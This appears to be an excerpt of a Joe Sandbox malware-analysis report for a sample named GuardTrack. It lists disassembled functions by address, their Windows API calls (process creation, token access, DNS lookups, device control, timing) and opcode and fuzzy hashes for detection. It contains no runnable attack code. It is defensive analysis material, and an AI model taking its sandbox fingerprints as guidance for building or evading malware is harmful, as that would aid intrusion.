Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: da0ed74037ef70a343f7b7c47a2c84a890bca203f04f7aeeb23f66291201d5e2
Instruction ID: 4922fe74426fc07e47d9091236263aaf23aeed31e18264c7f1530526a8796f4b
Opcode Fuzzy Hash: da0ed74037ef70a343f7b7c47a2c84a890bca203f04f7aeeb23f66291201d5e2
Instruction Fuzzy Hash: 8711D63A100355AFDB299F64DC45DBB77BAFF45350B40542BF906C72A0EB729940C791

Function 005E5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005E5331

Part of subcall function 005D593C: __FF_MSGBANNER.LIBCMT ref: 005D5953
Part of subcall function 005D593C: __NMSG_WRITE.LIBCMT ref: 005D595A
Part of subcall function 005D593C: RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,?,?,?,?,005D1003,?,0000FFFF), ref: 005D597F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5a3f71c8fce0409d2db89f727a6dc2d8ba9ea0c0e99a9b2dca742450c49fc712
Instruction ID: 2c099763ea2ac922fa072ffdfd463db6474daea8d967cfdd2e9aa5e4b61562e0
Opcode Fuzzy Hash: 5a3f71c8fce0409d2db89f727a6dc2d8ba9ea0c0e99a9b2dca742450c49fc712
Instruction Fuzzy Hash: 72113D31405A57AFCB393F79AC0965E3F957F593A4F200D57F598962D0EEB089408750

Function 005C5B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C5B58

Part of subcall function 005C56F8: _memset.LIBCMT ref: 005C5787
Part of subcall function 005C56F8: _wcscpy.LIBCMT ref: 005C57DB
Part of subcall function 005C56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005C57EB

KillTimer.USER32(?,00000001,?,?), ref: 005C5BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005C5BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00600D7C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: cbd9e4d193d55f3059fdccaf01d8fcf10947603f1637113f53095ad0f38f437f
Instruction ID: 4f67219877038e7fd94fb4c7e77fd11c11a5d51972ce314b6b2f1955fb6494c1
Opcode Fuzzy Hash: cbd9e4d193d55f3059fdccaf01d8fcf10947603f1637113f53095ad0f38f437f
Instruction Fuzzy Hash: 7121C1745447849FF7728BA48899FEBBFEDAF01308F00048DE69A56281D7743AC5CB51

Function 00614365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00614385
_memset.LIBCMT ref: 006143A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006143F8
CloseHandle.KERNEL32(00000000), ref: 00614401

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 9dd4cafe3383635bfbd32f0665d19e954a9a14d476f1c7118daebbf9ea49e8f8
Instruction ID: 34fbf430f21a5cf0f5ef13b135e45ed1503bc07ba9f659e18de3de0f0713d9f4
Opcode Fuzzy Hash: 9dd4cafe3383635bfbd32f0665d19e954a9a14d476f1c7118daebbf9ea49e8f8
Instruction Fuzzy Hash: A6110A759012287AE7309BA5AC4DFEBBB7CEF45720F04459AF908E7280D6704E808BA4

Function 00626A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00617E51,?,?,00000000), ref: 005C4041
Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00617E51,?,?,00000000,?,?), ref: 005C4065

gethostbyname.WSOCK32(?,?,?), ref: 00626A84
WSAGetLastError.WSOCK32(00000000), ref: 00626A8F
_memmove.LIBCMT ref: 00626ABC
inet_ntoa.WSOCK32(?), ref: 00626AC7

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: bf67e73c8800c5e797a09e5fdbd4607b52c0137cd45c52b6160d8eda797e670a
Instruction ID: fb1c87530b40d96f601d28856b2fa65de087b45899bbee3c6317d19e30747c13
Opcode Fuzzy Hash: bf67e73c8800c5e797a09e5fdbd4607b52c0137cd45c52b6160d8eda797e670a
Instruction Fuzzy Hash: 8C118475500019AFCB00EBE4DD4ADEE7BB9BF45300B044069F501A72A2DF30AE00CF91

Function 005B166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3

DefDlgProcW.USER32(?,00000020,?), ref: 005B16B4
GetClientRect.USER32(?,?), ref: 005EB93C
GetCursorPos.USER32(?), ref: 005EB946
ScreenToClient.USER32(?,?), ref: 005EB951

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: dd42e5a7b7c89a0d6ca0503ae111e0261fd52cacac1f00107250d24a53ec57e7
Instruction ID: 07a7fe687c441f5e95b5ffac201b57d1eff5ad9795235c8f427b693d42bd7468
Opcode Fuzzy Hash: dd42e5a7b7c89a0d6ca0503ae111e0261fd52cacac1f00107250d24a53ec57e7
Instruction Fuzzy Hash: 6A115839A0041AABDB04EF98C899DFE7BB9FB49301F500455FA52E7550D330BA51CBA9

Function 006096F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00609719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0060972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00609741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0060975C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fc07cc0c1db45d4de2a53aec68db4d17fa69454eebae1c41fd088338c6d197c8
Instruction ID: a8c6ca39ceb77fe9e4a7436bfe5e421598a522fa1a726c8b05bd4c38f20869aa
Opcode Fuzzy Hash: fc07cc0c1db45d4de2a53aec68db4d17fa69454eebae1c41fd088338c6d197c8
Instruction Fuzzy Hash: 4811483A941218FFEB10DF95C984EDEBBB9FB48710F204095EA04B7290D671AE11DBA4

Function 005B2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005B214F
GetStockObject.GDI32(00000011), ref: 005B2163
SendMessageW.USER32(00000000,00000030,00000000), ref: 005B216D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 7928eeb7f8986a563b45ef7a7ff9eb3ce99b87eed0496310c35a2964c299a3bc
Instruction ID: a40b69442b247ca3206fe3aead20657ff4079c97503393835bd8bcf8942c7d1e
Opcode Fuzzy Hash: 7928eeb7f8986a563b45ef7a7ff9eb3ce99b87eed0496310c35a2964c299a3bc
Instruction Fuzzy Hash: DE115BB2501559BFEB164F949C44EEB7F6AFF59394F050115FB0456120C731AC60DBA1

Function 00611941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006104EC,?,0061153F,?,00008000), ref: 0061195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,006104EC,?,0061153F,?,00008000), ref: 00611983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006104EC,?,0061153F,?,00008000), ref: 0061198D
Sleep.KERNEL32(?,?,?,?,?,?,?,006104EC,?,0061153F,?,00008000), ref: 006119C0

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: f0a5621f893841a799518ae9979f77721db471bfba793ce626dd821b26d7e45d
Instruction ID: b85c1bf120d0a3cc5c102a9e6d77151f449757e5022c23e176a977392203fb06
Opcode Fuzzy Hash: f0a5621f893841a799518ae9979f77721db471bfba793ce626dd821b26d7e45d
Instruction Fuzzy Hash: 03115A31C0052DDBDF00AFE4D958BEEBB7AFF0A711F044446EA90BB240CB3096908B95

Function 0063E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0063E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0063E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0063E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0063E234

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 808c347fada3148f41facefbe2e80450411dc45d5ee0c6ac70f5862b15943c36
Instruction ID: 5e01cd53ba605dab534fd21f5407d43190c99b74d28c66b20f5c88b9f68aea60
Opcode Fuzzy Hash: 808c347fada3148f41facefbe2e80450411dc45d5ee0c6ac70f5862b15943c36
Instruction Fuzzy Hash: E11161B9205314DBE3308F51DD08F93BBBDEB00B00F108559E716D6190D7B1E6049BE1

Function 005E71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 005E720B

Part of subcall function 005E78F2: __fltout2.LIBCMT ref: 005E791B

__cftog_l.LIBCMT ref: 005E7231
__cftoe_l.LIBCMT ref: 005E7263

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: dded5de6ea2e167ed68fce86fa6b8cc14603c7c7f53532794abd5e8d318d4b56
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: F8018C3604818EBBCF1A5E86CC058EE3F23FB5D340B088515FA9858131C336C9B1AB81

Function 0063B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0063B956
ScreenToClient.USER32(?,?), ref: 0063B96E
ScreenToClient.USER32(?,?), ref: 0063B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0063B9AD

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 8e7fd1b3dae2babc8cb9fd8b54a5bf1f937b4bdfd715483fd5a39f4573dd5672
Instruction ID: f7285d1d3f99f1cf9ef5acd252dab506b7830a3558ff3fac215cb6c128a394e2
Opcode Fuzzy Hash: 8e7fd1b3dae2babc8cb9fd8b54a5bf1f937b4bdfd715483fd5a39f4573dd5672
Instruction Fuzzy Hash: 761174B9D00209EFDB41DF98C884AEEBBF9FF49310F105156E915E3210D731AA618F90

Function 0063BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0063BCB6
_memset.LIBCMT ref: 0063BCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00678F20,00678F64), ref: 0063BCF4
CloseHandle.KERNEL32 ref: 0063BD06

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: bb52748d5d2ee953de112279c58d710b11e1089db0fcc6a3718e11ec7fe18afd
Instruction ID: 9a7b84e083698e56ee0aa9f9e69434b05841ab3ad4640c2a1feb3baff9499860
Opcode Fuzzy Hash: bb52748d5d2ee953de112279c58d710b11e1089db0fcc6a3718e11ec7fe18afd
Instruction Fuzzy Hash: 28F03AB26803157EE3506B65AC0DFBB3E5FEB49790F005422FA0CD61A2EB794C5087A9

Function 00617195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 006171A1

Part of subcall function 00617C7F: _memset.LIBCMT ref: 00617CB4

_memmove.LIBCMT ref: 006171C4
_memset.LIBCMT ref: 006171D1
LeaveCriticalSection.KERNEL32(?), ref: 006171E1

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: db647153a8b290d164d2aa6750f2be043359e83e5bc9265d2d9a41df9b8ea4d4
Instruction ID: 530d7747a1bca22c58d4ea6a27e50c93ae0b955f7b0a840015a0b361e745479f
Opcode Fuzzy Hash: db647153a8b290d164d2aa6750f2be043359e83e5bc9265d2d9a41df9b8ea4d4
Instruction Fuzzy Hash: 23F0303A100110ABCB516F55DC89A8ABB2AEF45360F08C056FE085E21AC731A951DBB4

Function 0063C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 005B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005B1729
Part of subcall function 005B16CF: SelectObject.GDI32(?,00000000), ref: 005B1738
Part of subcall function 005B16CF: BeginPath.GDI32(?), ref: 005B174F
Part of subcall function 005B16CF: SelectObject.GDI32(?,00000000), ref: 005B1778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0063C3E8
LineTo.GDI32(00000000,?,?), ref: 0063C3F5
EndPath.GDI32(00000000), ref: 0063C405
StrokePath.GDI32(00000000), ref: 0063C413

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 9cfe3516401655a2714bdad5a594d01bf9b0d79d37eff499c913422f8c111d00
Instruction ID: 3ec801776ab8ef44b11eb44fc4a9240e0d1277838c5540ffe471ac84e5ab8f20
Opcode Fuzzy Hash: 9cfe3516401655a2714bdad5a594d01bf9b0d79d37eff499c913422f8c111d00
Instruction Fuzzy Hash: CCF05E35005269BAEB226F54AC0DFDE3F9BAF06721F049000FB55611E2C7B46661DBE9

Function 0060AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0060AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 0060AA82
GetCurrentThreadId.KERNEL32 ref: 0060AA89
AttachThreadInput.USER32(00000000), ref: 0060AA90

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 815b513f7e6933cf7899772d151f1f289336f76e92305558d90d37b5abd4e293
Instruction ID: 1d8eaa3ff56f5530cc56a68fb2d0f95610cdd9236013ac0c6764e126277a56db
Opcode Fuzzy Hash: 815b513f7e6933cf7899772d151f1f289336f76e92305558d90d37b5abd4e293
Instruction Fuzzy Hash: 88E0C935685328BAEB215FA29D0DEEB7F5EEF167A1F009015FA0A95090C6718550CBA1

Function 005B25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 005B260D
SetTextColor.GDI32(?,000000FF), ref: 005B2617
SetBkMode.GDI32(?,00000001), ref: 005B262C
GetStockObject.GDI32(00000005), ref: 005B2634
GetWindowDC.USER32(?,00000000), ref: 005EC1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 005EC1D1
GetPixel.GDI32(00000000,?,00000000), ref: 005EC1EA
GetPixel.GDI32(00000000,00000000,?), ref: 005EC203
GetPixel.GDI32(00000000,?,?), ref: 005EC223
ReleaseDC.USER32(?,00000000), ref: 005EC22E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: c6e7edc179bef6c3e0dba8afbc81efd3d25f00fc89aa8bb0c98900c82d981552
Instruction ID: 2a839fdf1d257b16095e0d35efa8e360cfe0dd83335b93dd93db935f42068c42
Opcode Fuzzy Hash: c6e7edc179bef6c3e0dba8afbc81efd3d25f00fc89aa8bb0c98900c82d981552
Instruction Fuzzy Hash: B3E06535504284BBEB255FA4AC097D83F12FB16331F048366FBA9580E187714580DB11

Function 00609330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00609339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00608F04), ref: 00609340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00608F04), ref: 0060934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00608F04), ref: 00609354

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
